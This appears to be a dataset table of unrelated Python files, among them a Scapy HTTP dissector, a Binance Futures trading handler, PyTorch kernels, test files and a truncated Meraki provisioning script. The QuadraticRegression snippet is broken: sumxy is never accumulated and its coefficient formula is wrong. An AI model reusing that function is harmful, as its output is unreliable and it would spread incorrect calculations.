text string | size int64 | token_count int64 |
|---|---|---|
from typing import cast
from grizzly.context import GrizzlyContext
from grizzly.steps import * # pylint: disable=unused-wildcard-import # noqa: F403
from ....fixtures import BehaveFixture
def test_step_results_fail_ratio(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = cast(GrizzlyContext, behave.grizzly)
assert grizzly.scenario.validation.fail_ratio is None
assert not grizzly.scenario.should_validate()
step_results_fail_ratio(behave, 10)
assert grizzly.scenario.validation.fail_ratio == 0.1
assert grizzly.scenario.should_validate()
def test_step_results_avg_response_time(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = cast(GrizzlyContext, behave.grizzly)
assert grizzly.scenario.validation.avg_response_time is None
assert not grizzly.scenario.should_validate()
step_results_avg_response_time(behave, 200)
assert grizzly.scenario.validation.avg_response_time == 200
assert grizzly.scenario.should_validate()
def test_step_results_response_time_percentile(behave_fixture: BehaveFixture) -> None:
behave = behave_fixture.context
grizzly = cast(GrizzlyContext, behave.grizzly)
assert grizzly.scenario.validation.response_time_percentile is None
assert not grizzly.scenario.should_validate()
step_results_response_time_percentile(behave, 95, 800)
assert getattr(grizzly.scenario.validation, 'response_time_percentile', None) is not None
response_time_percentile = grizzly.scenario.validation.response_time_percentile
assert getattr(response_time_percentile, 'percentile', None) == 0.95
assert getattr(response_time_percentile, 'response_time', None) == 800
assert grizzly.scenario.should_validate()
| 1,785 | 632 |
"""Module for over expression tokenization."""
from .basic_regex_tokenizer import BasicRegexTokenizer
class OverExpression(BasicRegexTokenizer):
"""Over Expression tokenizer class."""
def pattern(self) -> str:
"""Return over expression regex."""
return r'\bover ?expression\b'
def token_type(self) -> str:
"""Return over expression token type."""
return 'OverExpression'
| 419 | 111 |
#!/usr/bin/env python3
from pathlib import Path
from jq_normaliser import JqNormaliser, Filter
class HypNormaliser(JqNormaliser):
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs, logger_tag='hypothesis-normaliser', delete_dominated=True, keep_both=False) # type: ignore
def cleanup(self) -> Filter:
return '.'
def main():
norm = HypNormaliser()
norm.main()
if __name__ == '__main__':
main()
| 465 | 157 |
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : Steeve Barbeau, Luca Invernizzi
# This program is published under a GPLv2 license
import re
from scapy.all import TCP, bind_layers, Packet, StrField
def _canonicalize_header(name):
''' Takes a header key (i.e., "Host" in "Host: www.google.com",
and returns a canonical representation of it '''
return name.strip().lower()
def _parse_headers(s):
''' Takes a HTTP packet, and returns a tuple containing:
- the first line (e.g., "GET ...")
- the headers in a dictionary
- the body '''
try:
headers, body = s.split("\r\n\r\n", 1)
except:
headers = s
body = ''
headers = headers.split("\r\n")
first_line, headers = headers[0].strip(), headers[1:]
headers_found = {}
for header_line in headers:
try:
key, value = header_line.split(':', 1)
except:
continue
headers_found[_canonicalize_header(key)] = header_line.strip()
return first_line, headers_found, body
def _dissect_headers(obj, s):
''' Takes a HTTP packet as the string s, and populates the scapy layer obj
(either HTTPResponse or HTTPRequest). Returns the first line of the
HTTP packet, and the body
'''
first_line, headers, body = _parse_headers(s)
for f in obj.fields_desc:
canonical_name = _canonicalize_header(f.name)
try:
header_line = headers[canonical_name]
except:
continue
key, value = header_line.split(':', 1)
obj.setfieldval(f.name, value.strip())
del headers[canonical_name]
if headers:
obj.setfieldval(
'Additional-Headers', '\r\n'.join(headers.values()) + '\r\n')
return first_line, body
def _self_build(obj, field_pos_list=None):
''' Takse an HTTPRequest or HTTPResponse object, and creates its internal
scapy representation as a string. That is, generates the HTTP
packet as a string '''
p = ""
for f in obj.fields_desc:
val = obj.getfieldval(f.name)
if not val:
continue
val += '\r\n'
if f.name in ['Method', 'Additional-Headers', 'Status-Line']:
p = f.addfield(obj, p, val)
else:
p = f.addfield(obj, p, "%s: %s" % (f.name, val))
return p
class HTTPRequest(Packet):
name = "HTTP Request"
http_methods = "^(OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT)"
fields_desc = [StrField("Method", None, fmt="H"),
StrField("Path", None, fmt="H"),
StrField("Http-Version", None, fmt="H"),
StrField("Host", None, fmt="H"),
StrField("User-Agent", None, fmt="H"),
StrField("Accept", None, fmt="H"),
StrField("Accept-Language", None, fmt="H"),
StrField("Accept-Encoding", None, fmt="H"),
StrField("Accept-Charset", None, fmt="H"),
StrField("Referer", None, fmt="H"),
StrField("Authorization", None, fmt="H"),
StrField("Expect", None, fmt="H"),
StrField("From", None, fmt="H"),
StrField("If-Match", None, fmt="H"),
StrField("If-Modified-Since", None, fmt="H"),
StrField("If-None-Match", None, fmt="H"),
StrField("If-Range", None, fmt="H"),
StrField("If-Unmodified-Since", None, fmt="H"),
StrField("Max-Forwards", None, fmt="H"),
StrField("Proxy-Authorization", None, fmt="H"),
StrField("Range", None, fmt="H"),
StrField("TE", None, fmt="H"),
StrField("Cache-Control", None, fmt="H"),
StrField("Connection", None, fmt="H"),
StrField("Date", None, fmt="H"),
StrField("Pragma", None, fmt="H"),
StrField("Trailer", None, fmt="H"),
StrField("Transfer-Encoding", None, fmt="H"),
StrField("Upgrade", None, fmt="H"),
StrField("Via", None, fmt="H"),
StrField("Warning", None, fmt="H"),
StrField("Keep-Alive", None, fmt="H"),
StrField("Allow", None, fmt="H"),
StrField("Content-Encoding", None, fmt="H"),
StrField("Content-Language", None, fmt="H"),
StrField("Content-Length", None, fmt="H"),
StrField("Content-Location", None, fmt="H"),
StrField("Content-MD5", None, fmt="H"),
StrField("Content-Range", None, fmt="H"),
StrField("Content-Type", None, fmt="H"),
StrField("Expires", None, fmt="H"),
StrField("Last-Modified", None, fmt="H"),
StrField("Cookie", None, fmt="H"),
StrField("Additional-Headers", None, fmt="H")]
def do_dissect(self, s):
''' From the HTTP packet string, populate the scapy object '''
first_line, body = _dissect_headers(self, s)
Method, Path, HTTPVersion = re.split("\s+", first_line)
self.setfieldval('Method', Method)
self.setfieldval('Path', Path)
self.setfieldval('Http-Version', HTTPVersion)
return body
def self_build(self, field_pos_list=None):
''' Generate the HTTP packet string (the oppposite of do_dissect) '''
return _self_build(self, field_pos_list)
class HTTPResponse(Packet):
name = "HTTP Response"
fields_desc = [StrField("Status-Line", None, fmt="H"),
StrField("Accept-Ranges", None, fmt="H"),
StrField("Age", None, fmt="H"),
StrField("E-Tag", None, fmt="H"),
StrField("Location", None, fmt="H"),
StrField("Proxy-Authenticate", None, fmt="H"),
StrField("Retry-After", None, fmt="H"),
StrField("Server", None, fmt="H"),
StrField("Vary", None, fmt="H"),
StrField("WWW-Authenticate", None, fmt="H"),
StrField("Cache-Control", None, fmt="H"),
StrField("Connection", None, fmt="H"),
StrField("Date", None, fmt="H"),
StrField("Pragma", None, fmt="H"),
StrField("Trailer", None, fmt="H"),
StrField("Transfer-Encoding", None, fmt="H"),
StrField("Upgrade", None, fmt="H"),
StrField("Via", None, fmt="H"),
StrField("Warning", None, fmt="H"),
StrField("Keep-Alive", None, fmt="H"),
StrField("Allow", None, fmt="H"),
StrField("Content-Encoding", None, fmt="H"),
StrField("Content-Language", None, fmt="H"),
StrField("Content-Length", None, fmt="H"),
StrField("Content-Location", None, fmt="H"),
StrField("Content-MD5", None, fmt="H"),
StrField("Content-Range", None, fmt="H"),
StrField("Content-Type", None, fmt="H"),
StrField("Expires", None, fmt="H"),
StrField("Last-Modified", None, fmt="H"),
StrField("Additional-Headers", None, fmt="H")]
def do_dissect(self, s):
''' From the HTTP packet string, populate the scapy object '''
first_line, body = _dissect_headers(self, s)
self.setfieldval('Status-Line', first_line)
return body
def self_build(self, field_pos_list=None):
''' From the HTTP packet string, populate the scapy object '''
return _self_build(self, field_pos_list)
class HTTP(Packet):
name = "HTTP"
def do_dissect(self, s):
return s
def guess_payload_class(self, payload):
''' Decides if the payload is an HTTP Request or Response, or
something else '''
try:
prog = re.compile(
r"^(?:OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT) "
r"(?:.+?) "
r"HTTP/\d\.\d$"
)
req = payload[:payload.index("\r\n")]
result = prog.match(req)
if result:
return HTTPRequest
else:
prog = re.compile(r"^HTTP/\d\.\d \d\d\d .+?$")
result = prog.match(req)
if result:
return HTTPResponse
except:
pass
return Packet.guess_payload_class(self, payload)
bind_layers(TCP, HTTP)
| 8,506 | 2,463 |
import os
import unittest
from flask_app.boot import load_dot_env, reset, is_loaded, load_env
from tests.unit.testutils import BaseUnitTestCase, get_function_name
from unittest_data_provider import data_provider
def get_env():
return (None, True), ('dev', True), ('development', True), ('integration', True), ('staging', True), (
'production', True)
def get_load_dot_env():
return (None, True), ('dev', True), ('development', True), ('integration', False), ('staging', False), (
'production', False)
class BootTestCase(BaseUnitTestCase):
@data_provider(get_env)
def test_load_env(self, env, expected):
self.logger.info('Running test: %s - %s', get_function_name(__name__), env)
APP_TYPE = os.environ['APP_TYPE']
self.logger.info("APP_TYPE: {}".format(APP_TYPE))
if APP_TYPE == 'Chalice':
reset()
load_env(env)
self.assertEqual(is_loaded(), expected)
else:
self.skipTest('test_load_env - Ignored because the APP_TYPE {}'.format(APP_TYPE))
@data_provider(get_load_dot_env)
def test_load_dot_env(self, env, expected):
self.logger.info('Running test: %s - %s', get_function_name(__name__), env)
APP_TYPE = os.environ['APP_TYPE']
self.logger.info("APP_TYPE: {}".format(APP_TYPE))
if APP_TYPE == 'Flask':
# AWS Image condition
if 'ENVIRONMENT_NAME' in os.environ:
if env == os.environ['ENVIRONMENT_NAME']:
expected = True
reset()
load_dot_env(env)
self.assertEqual(is_loaded(), expected)
else:
self.skipTest('test_load_dot_env - Ignored because the APP_TYPE {}'.format(APP_TYPE))
if __name__ == '__main__':
unittest.main()
| 1,800 | 566 |
def QuadraticRegression(px,py):
sumy = 0
sumx1= 0
sumx2= 0
sumx3 = 0
sumx4 = 0
sumxy = 0
sum2y = 0
n=len(px)
for i in range (n):
x = px[i]
y = py[i]
sumx1 += x
sumy += y
sumx2 += x*x
sumx3 += x*x*x
sumx4 += x*x*x*x
p = (n * sumxy - sumx1 * sumy) * (n * sumx3 - sumx2 * sumx1) - (n * sumx2 - sumx2 * sumy) * (n * sumx2 - sumx1 * sumx1)
q = (n * sumx3 - sumx1 * sumx2) * (n * sumx3 - sumx2 * sumx1) - (n * sumx4 - sumx2 * sumx2) * (n * sumx2 - sumx1 * sumx1)
c = (p/q)
b = ((n*sumxy - sumx1*sumy) - c*(n*sumx3 - sumx1*sumx2))/(n*sumx2 - sumx1*sumx1)
a = (sumy - b*sumx1 - c*sumx2)/n
return a,b,c
x=[0,1,2,3,4]
y=[1,1.8,1.3,2.5,6.3]
print(QuadraticRegression(x,y))
| 805 | 419 |
from typing import Any, Dict, Optional
from atcodertools.codegen.code_style_config import CodeStyleConfig
from atcodertools.codegen.models.code_gen_args import CodeGenArgs
from atcodertools.codegen.template_engine import render
from atcodertools.fmtprediction.models.format import (Format, ParallelPattern,
Pattern, SingularPattern,
TwoDimensionalPattern)
from atcodertools.fmtprediction.models.type import Type
from atcodertools.fmtprediction.models.variable import Variable
class RustCodeGenerator:
def __init__(self,
format_: Optional[Format[Variable]],
config: CodeStyleConfig) -> None:
self._format = format_
self._config = config
def generate_parameters(self) -> Dict[str, Any]:
if self._format is None:
return dict(prediction_success=False)
return dict(formal_arguments=self._formal_arguments(),
actual_arguments=self._actual_arguments(),
input_part=self._input_part(),
prediction_success=True)
def _input_part(self):
lines = []
for pattern in self._format.sequence:
var = pattern.all_vars()[0]
if isinstance(pattern, SingularPattern):
lines.append(self._generate_value_type_annotation(var))
elif isinstance(pattern, ParallelPattern):
lines.append(self._generate_array_type_annotation(var))
elif isinstance(pattern, TwoDimensionalPattern):
lines.append(self._generate_2darray_type_annotation(var))
else:
raise NotImplementedError
lines.append('')
lines.append('input! {')
for pattern in self._format.sequence:
var = pattern.all_vars()[0]
input_indent = ' '
if isinstance(pattern, SingularPattern):
lines.append(input_indent + self._generate_value_input(var))
elif isinstance(pattern, ParallelPattern):
lines.append(input_indent + self._generate_array_input(var))
elif isinstance(pattern, TwoDimensionalPattern):
lines.append(input_indent + self._generate_2darray_input(var))
else:
raise NotImplementedError
lines.append('};')
return "\n".join(lines)
def _generate_value_type_annotation(self, var: Variable):
return 'let {name}: {type};'.format(
type=self._to_rust_type(var.type),
name=self._var_name(var.name, True))
def _generate_array_type_annotation(self, var: Variable):
return 'let {name}: Vec<{type}>;'.format(
name=self._var_name(var.name, False),
type=self._to_rust_type(var.type))
def _generate_2darray_type_annotation(self, var: Variable):
return 'let {name}: Vec<Vec<{type}>>;'.format(
name=self._var_name(var.name, False),
type=self._to_rust_type(var.type))
def _to_rust_type(self, type_: Type):
if type_ == Type.int:
return 'i64'
if type_ == Type.float:
return 'f64'
if type_ == Type.str:
return 'Vec<char>'
else:
raise NotImplementedError
def _generate_value_input(self, var: Variable):
return '{name}: {type},'.format(
name=self._var_name(var.name, True),
type=self._to_input_type(var.type))
def _generate_array_input(self, var: Variable):
length = var.first_index.get_length()
return '{name}: [{type}; {num_rows} as usize],'.format(
name=self._var_name(var.name, False),
type=self._to_input_type(var.type),
num_rows=self._var_name(str(length), True) if length.is_variable_node() else length)
def _generate_2darray_input(self, var: Variable):
second_length = var.second_index.get_length()
first_length = var.first_index.get_length()
return '{name}: [[{type}; {num_cols} as usize]; {num_rows} as usize],'.format(
name=self._var_name(var.name, False),
type=self._to_input_type(var.type),
num_cols=self._var_name(str(second_length), True) if second_length.is_variable_node() else second_length,
num_rows=self._var_name(str(first_length), True) if first_length.is_variable_node() else first_length)
def _to_input_type(self, type_: Type):
if type_ == Type.int:
return 'i64'
if type_ == Type.float:
return 'f64'
if type_ == Type.str:
return 'chars'
else:
raise NotImplementedError
def _var_name(self, name: str, singular: bool) -> str:
if singular:
return name.lower()
# `as` is a reserved word
if name == 'A':
return 'As'
return name.lower() + 's'
def _actual_arguments(self) -> str:
"""
:return always empty string
"""
return ''
def _formal_arguments(self) -> str:
"""
:return always empty string
"""
return ''
class NoPredictionResultGiven(Exception):
pass
def main(args: CodeGenArgs) -> str:
code_parameters = RustCodeGenerator(
args.format, args.config).generate_parameters()
return render(
args.template,
mod=args.constants.mod,
yes_str=args.constants.yes_str,
no_str=args.constants.no_str,
**code_parameters
)
| 5,591 | 1,607 |
"""
This module contains an implementation for Binance Futures (BinanceFuturesExchangeHandler)
"""
from __future__ import annotations
import pandas as pd
import typing
import json
import logging
import pandas as pd
from datetime import datetime
from dataclasses import dataclass
from . import futurespy as fp
from . import AbstractExchangeHandler
class BinanceFuturesExchangeHandler(AbstractExchangeHandler):
exchange_information = fp.MarketData().exchange_info()
def __init__(self, public_key, private_key):
super().__init__(public_key, private_key)
self._client = fp.Client(
testnet=False, api_key=self._public_key, sec_key=self._private_key
)
self._orderId_dict = {}
self._clOrderId_dict = {}
self.logger = logging.Logger(__name__)
def get_symbols_data(self) -> typing.Dict[str, AbstractExchangeHandler.SymbolData]:
symbols_dict = {}
exchange_symbols_data = BinanceFuturesExchangeHandler.exchange_information[
"symbols"
]
for symbol_data in exchange_symbols_data:
min_volume = float(symbol_data["filters"][1]["minQty"])
max_volume = float(symbol_data["filters"][1]["maxQty"])
step_size = float(symbol_data["filters"][1]["stepSize"])
symbols_dict[symbol_data["symbol"]] = self.SymbolData(
min_volume=min_volume, max_volume=max_volume, step_size=step_size
)
return symbols_dict
def start_kline_socket(
self,
on_update: typing.Callable[[AbstractExchangeHandler.KlineCallback], None],
candle_type: str,
pair_name: str,
) -> None:
def _on_update(message):
candle = message["k"]
on_update(
self.KlineCallback(
time=pd.to_datetime(candle["t"], unit="ms"),
open=float(candle["o"]),
high=float(candle["h"]),
low=float(candle["l"]),
close=float(candle["c"]),
volume=float(candle["v"]),
final=candle["x"],
message=message,
)
)
ws = fp.WebsocketMarket(
symbol=pair_name,
on_message=lambda _, message: _on_update(message),
on_close=lambda _: self.start_kline_socket(
on_update, candle_type, pair_name
),
interval=candle_type,
)
ws.candle_socket()
def start_price_socket(
self,
on_update: typing.Callable[[AbstractExchangeHandler.PriceCallback], None],
pair_name: str,
) -> None:
def _on_update(message):
on_update(self.PriceCallback(float(message["p"])))
ws = fp.WebsocketMarket(
symbol=pair_name,
on_message=lambda _, message: _on_update(message),
on_close=lambda _: self.start_price_socket(on_update, pair_name),
)
ws.mark_price_socket()
def start_user_update_socket(
self, on_update: typing.Callable[[AbstractExchangeHandler.UserUpdate], None]
) -> None:
super().start_user_update_socket(on_update)
for data in self._client.balance():
on_update(self.BalanceUpdate(balance=data["balance"], symbol=data["asset"]))
for event in self._client.current_open_orders():
order_data = dict(
orderID=str(event["orderId"]),
client_orderID=str(event["clientOrderId"]),
status=event["status"],
symbol=event["symbol"],
price=float(event["price"]),
average_price=float(event["avgPrice"]),
fee=float(event["n"]) if "n" in event else 0,
fee_asset=event["N"] if "N" in event else "",
volume=float(event["origQty"]),
volume_realized=float(event["executedQty"]),
time=pd.to_datetime(event["time"], unit="ms"),
message=event,
)
self._register_order_data(order_data)
on_update(self.OrderUpdate(**order_data))
for position in self._client.position_info():
on_update(
self.PositionUpdate(
symbol=position["symbol"],
size=float(position["positionAmt"]),
value=float(position["positionAmt"])
* float(position["entryPrice"]),
entry_price=float(position["entryPrice"]),
liquidation_price=float(position["liquidationPrice"]),
)
)
def _on_update_recieved(message: typing.Dict[str, typing.Any]) -> None:
if message["e"] == "ACCOUNT_UPDATE":
for balance in message["a"]["B"]:
on_update(
self.BalanceUpdate(balance=balance["wb"], symbol=balance["a"])
)
for position in message["a"]["P"]:
on_update(
self.PositionUpdate(
symbol=position["s"],
size=float(position["pa"]),
value=float(position["pa"]) * float(position["ep"]),
entry_price=float(position["ep"]),
liquidation_price=float("nan"), # TODO
)
)
elif message["e"] == "ORDER_TRADE_UPDATE":
event = message["o"]
order_data = dict(
orderID=str(event["i"]),
client_orderID=str(event["c"]),
status=event["X"],
symbol=event["s"],
price=float(event["p"]),
average_price=float(event["ap"]),
fee=float(event["n"]) if "n" in event else 0,
fee_asset=event["N"] if "N" in event else "",
volume=float(event["q"]),
volume_realized=float(event["z"]),
time=pd.to_datetime(event["T"], unit="ms"),
message=message,
)
self._register_order_data(order_data)
on_update(self.OrderUpdate(**order_data))
self._client.user_update_socket(
on_message=lambda ws, message: _on_update_recieved(json.loads(message)),
on_close=lambda x: self.start_user_update_socket(on_update),
)
def _round_price(
self, symbol: str, price: typing.Optional[float]
) -> typing.Optional[float]:
for d in self.exchange_information["symbols"]:
if d["symbol"] == symbol:
price_precision = d["pricePrecision"]
break
else:
raise ValueError(f"{symbol} is not in exchange info")
return None if price is None else round(price, price_precision)
_T = typing.TypeVar("_T", float, None)
def _round_volume(self, symbol: str, volume: _T) -> _T:
for d in self.exchange_information["symbols"]:
if d["symbol"] == symbol:
quantity_precision = d["quantityPrecision"]
break
else:
raise ValueError(f"{symbol} is not in exchange info")
if (
not isinstance(volume, float)
and not isinstance(volume, int)
and volume is not None
):
raise ValueError
return (
None
if volume is None
else round(typing.cast(float, volume), quantity_precision)
)
@staticmethod
def get_pairs_list() -> typing.List[str]:
"""get_pairs_list Returns all available pairs on exchange
Returns:
typing.List[str]: The list of symbol strings
"""
return [
pair["symbol"]
for pair in BinanceFuturesExchangeHandler.exchange_information["symbols"]
]
async def load_historical_data(
self, symbol: str, candle_type: str, amount: int
) -> pd.DataFrame:
"""load_historical_data Loads historical klines from exchange
Args:
symbol (str): Pair name
candle_type (str): Exchange specific type of candles ("1m" for example)
amount (int): Number of klines to load
Returns:
pd.DataFrame: Dataframe with columns: Date, Open, High, Low, Close, Volume
"""
marketDataLoader = fp.MarketData(
symbol=symbol, interval=candle_type, testnet=False
)
data = marketDataLoader.load_historical_candles(count=amount).iloc[:-1]
data = data[["Date", "Open", "High", "Low", "Close", "Volume"]]
return data
async def create_order(
self,
symbol: str,
side: str,
price: typing.Optional[float],
volume: float,
client_ordID: typing.Optional[str] = None,
) -> AbstractExchangeHandler.NewOrderData:
"""create_order Place one limit or market order
Args:
symbol (str): Pair name, for which to place an order
side (str): "Buy" or "Sell"
price (typing.Optional[float]): If the price is set,
the price for limit order. Else - market order.
volume (float): The volume of the order
client_ordID (typing.Optional[str], optional): Client order_id.
Could be generated using generate_client_order_id(). Defaults to None.
Returns:
AbstractExchangeHandler.NewOrderData: Data of the resulting order.
"""
if client_ordID is None:
if price is not None:
result = self._client.new_order(
symbol=symbol,
side=side.upper(),
orderType="LIMIT",
quantity=self._round_volume(symbol, volume),
price=self._round_price(symbol, price),
timeInForce="GTX", # POST ONLY
)
else:
result = self._client.new_order(
symbol=symbol,
side=side.upper(),
quantity=self._round_volume(symbol, volume),
orderType="MARKET",
)
else:
self._user_update_pending(
client_ordID,
self._round_price(symbol, price),
self._round_volume(symbol, volume),
symbol,
side.upper(),
)
if price is not None:
result = self._client.new_order(
newClientOrderId=client_ordID,
symbol=symbol,
side=side.upper(),
orderType="LIMIT",
quantity=self._round_volume(symbol, volume),
price=self._round_price(symbol, price),
timeInForce="GTX", # POST ONLY
)
else:
result = self._client.new_order(
newClientOrderId=client_ordID,
symbol=symbol,
quantity=self._round_volume(symbol, volume),
side=side.upper(),
orderType="MARKET",
)
try:
return AbstractExchangeHandler.NewOrderData(
orderID=result["orderId"], client_orderID=result["clientOrderId"]
)
except:
if client_ordID is not None:
self._user_update_failed(client_ordID)
return AbstractExchangeHandler.NewOrderData(
orderID="", client_orderID=client_ordID
)
else:
raise
async def create_orders(
self,
symbol: str,
data: typing.List[typing.Tuple[str, float, float, typing.Optional[str]]],
) -> typing.List[AbstractExchangeHandler.NewOrderData]:
"""create_orders Create a lot of orders from one request (if the exchange supports it)
If the exchange does not support it, should create a parallel http requests, but it should be warned in docstring.
Args:
symbol (str): Pair name, for which to place orders
data (typing.List[typing.Tuple[str, float, float, typing.Optional[str]]]): The list of tuple params like in
create_order() - (side, price, volume, client_ordID), except price should not be None.
Returns:
typing.List[AbstractExchangeHandler.NewOrderData]: List of results
"""
orders: typing.List[typing.Dict[str, typing.Union[str, float]]] = [
{
"symbol": symbol,
"side": order_data[0].upper(),
"type": "LIMIT",
"quantity": self._round_volume(symbol, order_data[2]),
"price": typing.cast(float, self._round_price(symbol, order_data[1])),
# "timeInForce" : "GTX" # POST ONLY
}
if len(order_data) == 3 or order_data[3] is None
else {
"clOrdID": order_data[3],
"symbol": symbol,
"side": order_data[0].upper(),
"type": "LIMIT",
"quantity": self._round_volume(symbol, order_data[2]),
"price": typing.cast(float, self._round_price(symbol, order_data[1])),
# "timeInForce" : "GTX" # POST ONLY
}
for order_data in data
]
for order in orders:
self._user_update_pending(
client_orderID=str(order["clOrdID"]),
price=float(order["price"]),
volume=float(order["quantity"]),
symbol=str(order["symbol"]),
side=str(order["side"]),
)
results = []
orders_list = self._split_list(lst=orders, size=5)
for tmp_orders_list in orders_list:
results.append(self._client.place_multiple_orders(tmp_orders_list))
return [
AbstractExchangeHandler.NewOrderData(
orderID=result["orderID"], client_orderID=result["clOrdID"]
)
for result in results
]
async def cancel_order(
self,
order_id: typing.Optional[str] = None,
client_orderID: typing.Optional[str] = None,
) -> None:
"""cancel_order Cancel one order via order_id or client_orderID
Either order_id or client_orderID should be sent.
If both are sent, will use order_id.
Args:
order_id (typing.Optional[str], optional): Server's order id. Defaults to None.
client_orderID (typing.Optional[str], optional): Client's order id. Defaults to None.
"""
self._user_update_pending_cancel(
order_id=order_id, client_orderID=client_orderID
)
if order_id is not None and order_id in self._order_table_id:
self._client.cancel_order(
symbol=self._order_table_id[order_id]["symbol"], orderId=order_id
)
elif client_orderID is not None and client_orderID in self._order_table_clid:
self._client.cancel_order(
symbol=self._order_table_clid[client_orderID]["symbol"],
orderId=client_orderID,
clientID=True,
)
else:
raise ValueError(
"Either order_id of client_orderID should be sent, but both are None"
)
@staticmethod
def _split_list(lst, size):
return [lst[i : i + size] for i in range(0, len(lst), size)]
async def cancel_orders(self, orders: typing.List[str]) -> None:
"""cancel_orders Cancels a lot of orders in one requets
If the exchange does not support it, should create a parallel http requests, but it should be warned in docstring.
Args:
orders (typing.List[str]): The list of server's order_ids.
"""
for order_id in orders:
self._user_update_pending_cancel(order_id=order_id)
to_cancel_dict: typing.Dict[str, typing.List[str]] = {}
for order in orders:
order_symbol: str = self._order_table_id[order]["symbol"]
if order_symbol not in to_cancel_dict:
to_cancel_dict[order_symbol] = []
to_cancel_dict[order_symbol].append(order)
results = []
for symbol in to_cancel_dict.keys():
tmp_list = self._split_list(to_cancel_dict[symbol], 10)
for lst in tmp_list:
result = self._client.cancel_multiple_orders(
symbol=symbol, orderIdList=lst
)
results.append(result)
| 16,873 | 4,580 |
name = 'orbit'
__version__ = '1.0.10'
| 39 | 22 |
import torch
from typing import Union, Iterable
def center(k: torch.Tensor) -> torch.Tensor:
"""Center features of a kernel by pre- and post-multiplying by the centering matrix H.
In other words, if k_ij is dot(x_i, x_j), the result will be dot(x_i - mu_x, x_j - mu_x).
:param k: a n by n Gram matrix of inner products between xs
:return: a n by n centered matrix
"""
n = k.size()[0]
if k.size() != (n, n):
raise ValueError(
f"Expected k to be nxn square matrix, but it has size {k.size()}"
)
H = (
torch.eye(n, device=k.device, dtype=k.dtype)
- torch.ones((n, n), device=k.device, dtype=k.dtype) / n
)
return H @ k @ H
class Kernel(object):
def __call__(
self, x: torch.Tensor, y: Union[None, torch.Tensor] = None
) -> torch.Tensor:
if y is None:
y = x
if x.size()[0] != y.size()[0]:
raise ValueError("Mismatch in first dimension of x and y")
return self._call_impl(x, y)
def _call_impl(self, x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
raise NotImplementedError("Kernel._call_impl must be implemented by a subclass")
def string_id(self):
raise NotImplementedError("Kernel.name must be implemented by a subclass")
class SumKernel(Kernel):
def __init__(self, kernels: Iterable[Kernel], weights=None):
super(SumKernel, self).__init__()
self.kernels = list(kernels)
self.weights = (
torch.tensor(weights)
if weights is not None
else torch.ones(len(self.kernels))
)
def _call_impl(self, x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
tot = self.weights[0] * self.kernels[0](x, y)
for w, k in zip(self.weights[1:], self.kernels[1:]):
tot += k(x, y) * w
return tot
def string_id(self):
return f"SumKernel[{'+'.join(k.string_id() for k in self.kernels)}]"
| 1,971 | 695 |
#!/usr/bin/env python3
"""Copyright (c) 2020 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Cisco Sample
Code License, Version 1.1 (the "License"). You may obtain a copy of the
License at
https://developer.cisco.com/docs/licenses
All use of the material herein must be in accordance with the terms of
the License. All rights not expressly granted by the License are
reserved. Unless required by applicable law or agreed to separately in
writing, software distributed under the License is distributed on an "AS
IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
or implied."""
import csv
import sys
from meraki_functions import *
from env import *
sensors_file = open("sensors.csv", "r")
csv_reader = csv.DictReader(sensors_file)
networks = {} #dictionary will map network names to network ids
networks_to_organizations = {} #dictionary will map networks to their organizations
for row in csv_reader:
org_id = getOrgID(base_url, headers, row["organization"])
if org_id is None:
print("No organization exists with the name".format(row["organization"]))
sys.exit(1)
net_id = getNetworkID(base_url, headers, org_id, row["network"])
if net_id is None:
print("No network exists in the organization with ID {} with the name {}".format(org_id, row["network"]))
sys.exit(1)
networks[row["network"]] = net_id #the key row["network"] is the network name
networks_to_organizations[net_id] = org_id
serial = row["serial"]
status_code = claimDevicesToNetwork(base_url, headers, net_id, [serial])
if status_code != 200:
print("{} Error".format(status_code))
print("There was an error adding the device: {} to the network with ID {}.".format(serial, net_id))
sys.exit(1)
sensor_details = {
"name": row["name"],
"address": row["location"]
}
status_code = editDeviceDetails(base_url, headers, serial, sensor_details)
if status_code != 200:
print("{} Error".format(status_code))
print("There was an error editing the device {} with these details: {}".format(serial, sensor_details))
sys.exit(1)
print("Sensor {} was added to network {}".format(serial, row["network"]))
sensors_file.close()
sensor_profile_file = open("sensors_to_profiles.csv", "r")
csv_reader = csv.DictReader(sensor_profile_file)
sensors_to_profiles = {} #dictionary will map the sensors to the alert profiles they need
for row in csv_reader:
alert_profile = row["alert_profile"]
serial = row["sensor_serial"]
if alert_profile in sensors_to_profiles.keys(): #we've already added this alert profile to the dictionary, so we just add another sensor the list
sensors_to_profiles[alert_profile].append(serial)
else: #we haven't yet added this alert profile to the dictionary, so we create a new alert profile key and assign it a value of a new list with this serial number as the first value
sensors_to_profiles[alert_profile] = [serial]
sensor_profile_file.close()
alert_recipients_file = open("alert_recipients.csv", "r")
csv_reader = csv.DictReader(alert_recipients_file)
profiles_to_recipients = {} #dictionary will map the alert profiles to the alert recipients for that profile - this will be a nested dictionary
'''
Data structure example
profiles_to_recipients = {
"network name": {
"alert profile": ["email", "email", "email"],
"alert profile": ["email", "email", "email"]
}
}
'''
for row in csv_reader:
profile_name = row["alert_profile"]
net_name = row["network"]
recipient = row["email"] #the recipient is defined by an email address
if net_name in profiles_to_recipients.keys(): #we've already added this network to the dictionary, so we need to check if the alert profile has also already been seen
if profile_name in profiles_to_recipients[net_name].keys(): #we've already added this alert profile to the dictionary, so we just need to add the recipient to the list
profiles_to_recipients[net_name][profile_name].append(recipient)
else: #we haven't yet seen this alert profile, so we need to add a new key to the dictionary that is the profile name and assign it a value of a new list with this recipient as the first value
profiles_to_recipients[net_name][profile_name] = [recipient]
else: #we haven't yet added this network to the dictionary, so we need to add a new key to the dictionary that is the network name and assign it a value of a dictionary with a key of the alert profile name with the value of a new list with this recipient as the first value
profiles_to_recipients[net_name] = {
profile_name: [recipient]
}
alert_recipients_file.close()
alert_profile_file = open("alert_profiles.csv", "r")
csv_reader = csv.DictReader(alert_profile_file)
for row in csv_reader:
temp_threshold = row["temp_threshold"]
temp_duration = row["temp_duration"]
profile_name = row["name"]
net_name = row["network"]
